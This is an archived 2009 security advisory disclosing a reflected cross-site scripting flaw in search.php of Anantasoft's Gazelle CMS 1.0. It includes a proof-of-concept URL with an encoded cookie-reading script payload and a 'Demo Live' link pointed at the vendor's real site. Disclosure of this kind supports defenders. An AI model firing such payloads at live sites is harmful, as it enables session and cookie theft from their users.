Anantasoft's Gazelle CMS 1.0 XSS

Anantasoft's Gazelle CMS 1.0 XSS: Posted Sep 3, 2009; Authored by ghostblup; Anantasoft's Gazelle CMS version 1.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 79bd28567ecad20215cff35bb01b17daca030b1381183d1b5dd8107f0a10acde; Download | Favorite | View

Anantasoft's Gazelle CMS 1.0 XSS

                       ____________________
                      / /******ghostblup********\ \
                     / /  i love you  Indonesia   \ \
                   /  /      i love you ratih          \ \
                  /  /            i love you full         \ \
---------------------
--------------------------
============================================
----------------------------------------------------------------------------------------



---------------------------------------------------------------------------------
[ghostblup|adv02] Anantasoft's Gazelle CMS 1.0
---------------------------------------------------------------------------------

Author       : ghostblup
Date          : September, 3 th 2009
Location    : Palembang, Indonesia
my blog     : http://www.ghostblup.blogspot.com
Impact       : Exposure of sensitive information
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Anantasoft's Gazelle CMS
version     : <= 1.0
Vendor     : http://www.anantasoft.com/
Download : http://sourceforge.net/projects/ananta/
License    : GNU General Public License (GPL)

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

Critical Cross-site scripting (XSS).
search.php is not in the filter that allows XSS
/ session/cookies stolen

Poc/Exploit:
~~~~~~~

http://www.example.com.my/[path]/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Demo Live:
~~~~~~~

http://www.anantasoft.com/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Dork:
~~~
Google : N/A


Solution:
~~~~~
- Edit the source code to ensure that input is properly verified.

---------------------------------------------------------------------------

Shoutz:
~~~~~
~ My Love             : Ratih Permata Sari
~ My friends          : Amy,suset,revi,uwix^_^, Blackgirl ,
                              jasakreativkomputer, cyberlau, Vldaz, _persona

~ My inspiration     : K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork

 ---------------------------------------------------------------------------
Contact:
~~~~~~

ghostblup@gmail.com

My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 60 files
Debian 19 files
Gentoo 8 files
Apple 5 files
Google Security Research 4 files
Jann Horn 3 files
Spencer McIntyre 3 files
LiquidWorm 3 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Anantasoft's Gazelle CMS 1.0 XSS

Anantasoft's Gazelle CMS 1.0 XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Anantasoft's Gazelle CMS 1.0 XSS

Share This

Anantasoft's Gazelle CMS 1.0 XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems